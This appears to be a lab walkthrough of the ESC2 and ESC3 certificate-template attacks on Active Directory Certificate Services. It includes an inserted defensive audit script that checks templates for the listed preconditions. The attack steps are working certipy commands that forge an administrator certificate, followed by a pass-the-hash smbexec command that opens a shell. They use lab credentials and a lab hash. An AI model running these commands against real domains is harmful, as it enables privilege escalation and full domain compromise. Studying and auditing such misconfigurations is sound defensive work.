ADCS - ESC2 & ESC3

  • In order to abuse this misconfiguration, the following conditions must be met:

    1. The Enterprise CA grants low-privileged users enrollment rights. Details are the same as in ESC1.

    2. Manager approval is disabled. Details are the same as in ESC1.

    3. No authorized signatures are required. Details are the same as in ESC1.

    4. An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Details are the same as in ESC1.

    5. The certificate template defines Any Purpose EKUs or no EKU.

Query cert

sudo certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC2 -ca MARYLAND-CA
  • Query cert with the Certificate Request Agent certificate we got before (-pfx)

sudo certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template User -ca MARYLAND-CA -on-behalf-of 'maryland\administrator' -pfx joaquin.pereida.pfx
  • Auth

sudo certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12

Get Shell or POWERSHELL :)

smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da 'MARYLAND'/'Administrator'@'maryland.local'
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da 'MARYLAND'/'Administrator'@'maryland.local' -shell-type powershell
  • We can also do the same with the ESC3-CRA and ESC3 templates in the lab:

Enrollment Agent Templates — ESC3

In order to abuse this misconfiguration, the following conditions must be met:

  1. The Enterprise CA grants low-privileged users enrollment rights. Details are the same as in ESC1.

  2. Manager approval is disabled. Details are the same as in ESC1.

  3. No authorized signatures are required. Details are the same as in ESC1.

  4. An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Details are the same as in ESC1.

  5. The certificate template defines the Certificate Request Agent EKU. The Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) allows for requesting other certificate templates on behalf of other principals.

  6. Enrollment agent restrictions are not implemented on the CA.
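The five template-side conditions listed here (and the matching list under ESC2 above) can be checked from the template's LDAP attributes; the audit below is an added example, not code from this page or from certipy. It assumes each template is a dict carrying the real attributes pKIExtendedKeyUsage, msPKI-Enrollment-Flag and msPKI-RA-Signature plus a constructed enroll_principals list standing in for the security descriptor; condition 6 is a CA-side setting and is not checked.

```python
# Audit of certificate-template attributes against the ESC2/ESC3 preconditions
# listed above. Sample template records are constructed inline in the shape of
# pKICertificateTemplate LDAP attributes; they are not real directory data.

ANY_PURPOSE_EKU = "2.5.29.37.0"                     # "Any Purpose" EKU OID
CERT_REQUEST_AGENT_EKU = "1.3.6.1.4.1.311.20.2.1"   # Certificate Request Agent OID
CT_FLAG_PEND_ALL_REQUESTS = 0x2   # msPKI-Enrollment-Flag bit: manager approval required
# Principals treated as low-privileged when they hold Enroll rights (assumption)
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Everyone", "Domain Computers"}


def classify_template(tpl: dict) -> set:
    """Return the subset of {"ESC2", "ESC3"} whose template-side conditions hold.

    Conditions 1-4 are shared; condition 5 (the EKU set) decides which applies.
    ESC3's condition 6 lives on the CA, not on the template, so it is not checked.
    """
    manager_approval = bool(tpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS)
    signatures_required = tpl["msPKI-RA-Signature"] > 0
    low_priv_enroll = bool(LOW_PRIV_PRINCIPALS & set(tpl["enroll_principals"]))
    if manager_approval or signatures_required or not low_priv_enroll:
        return set()                            # conditions 1-4 not met: neither applies
    ekus = set(tpl["pKIExtendedKeyUsage"])
    findings = set()
    if not ekus or ANY_PURPOSE_EKU in ekus:     # condition 5 for ESC2: Any Purpose or no EKU
        findings.add("ESC2")
    if CERT_REQUEST_AGENT_EKU in ekus:          # condition 5 for ESC3: Certificate Request Agent
        findings.add("ESC3")
    return findings


def audit(templates: dict) -> dict:
    """Map template name -> sorted list of applicable findings (empty if none)."""
    return {name: sorted(classify_template(t)) for name, t in templates.items()}


# Constructed sample records named after the lab templates on this page.
SAMPLE_TEMPLATES = {
    "ESC2": {"pKIExtendedKeyUsage": [ANY_PURPOSE_EKU], "msPKI-Enrollment-Flag": 0,
             "msPKI-RA-Signature": 0, "enroll_principals": ["Domain Users"]},
    "ESC3-CRA": {"pKIExtendedKeyUsage": [CERT_REQUEST_AGENT_EKU], "msPKI-Enrollment-Flag": 0,
                 "msPKI-RA-Signature": 0, "enroll_principals": ["Domain Users"]},
    # Same EKU, but manager approval on, one signature required, admins-only enrollment
    "Hardened-CRA": {"pKIExtendedKeyUsage": [CERT_REQUEST_AGENT_EKU], "msPKI-Enrollment-Flag": 0x2,
                     "msPKI-RA-Signature": 1, "enroll_principals": ["Domain Admins"]},
}

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_TEMPLATES).items():
        print(f"{name}: {', '.join(findings) or 'ESC2/ESC3 conditions not met'}")
```

Fixing any one of conditions 1-4 (manager approval, a required signature, or removing low-privileged Enroll rights) clears both findings, which is what the Hardened-CRA record demonstrates.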

certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC3-CRA -ca MARYLAND-CA
certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC3 -ca MARYLAND-CA -on-behalf-of 'maryland\administrator' -pfx joaquin.Pereida.pfx
certipy auth -pfx administrator.pfx -username administrator -domain maryland.local -dc-ip 192.168.56.12